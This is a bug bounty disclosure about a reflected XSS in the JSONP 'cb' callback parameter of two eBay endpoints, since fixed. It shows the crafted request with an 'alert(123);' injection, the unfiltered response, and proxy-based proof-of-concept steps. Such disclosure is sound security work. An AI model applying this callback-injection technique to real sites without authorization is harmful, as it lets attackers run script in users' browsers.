I would like to elaborate the reflected XSS finding that I have reported to eBay during the bug bounty program.
While I was playing with the proxy, I focused on the value of the cb parameter (which refers to the callback) in the requests sent to the following URLs:
http://rewards.ebay.com/ws/eBayISAPI.dll?GetRewardsInfo
http://www.ebay.com/itm/ws/eBayISAPI.dll?ViewItemLite
I noticed that the value is returned in the response in a JavaScript context without filtering or encoding for both URLs. Here's a snippet from the request sent to the rewards page with the sample injection alert(123); in the cb parameter:
GET /ws/eBayISAPI.dll?GetRewardsInfo&item=121071656603&ShowRewards=true&isBucksNew=true&isInvited=false&baseOffer=2&bucksLink=http://my.ebay.com/ws/eBayISAPI.dll?RewardsIntEnroll&CTASignup=false&ExtLanding=false&ssPageName=VI:joinrewards&isEnrolled=false&isClosedVI=false&myebayBucksLink=null&ShowCoupon=false&IsBidFlow=true&ShowBML=true&IsViewItem=true&item=121071656603&cb=alert(123);jQuery1707709477525318212_1361715451002 HTTP/1.1
Host: rewards.ebay.com
The injected value is returned in the JavaScript response without filtering or encoding, as shown below:
alert(123);jQuery1707709477525318212_1361715451002({"couponLinkMsg":null,"nectarOverlayContent":null,"css":"span.offer-bmlcnt>span{font-family:Verdana;font-size:10px;color:#666}.....
No tags are needed in the injected string because the response context is already JavaScript: whatever is placed in cb is parsed and executed as code before the callback invocation.
For a proof of concept, I did the following steps:
1- Navigated to www.ebay.com
2- Searched for an item
3- Clicked on one of the resulting items
4- Used a proxy to tamper with the “cb” parameter while calling http://rewards.ebay.com/ws/eBayISAPI.dll?GetRewardsInfo
5- The script got executed as shown below:
eBay fixed the issue and added my name to their hall of fame list at http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
eBay's bug bounty program rules are available at http://pages.ebay.com/securitycenter/Researchers.html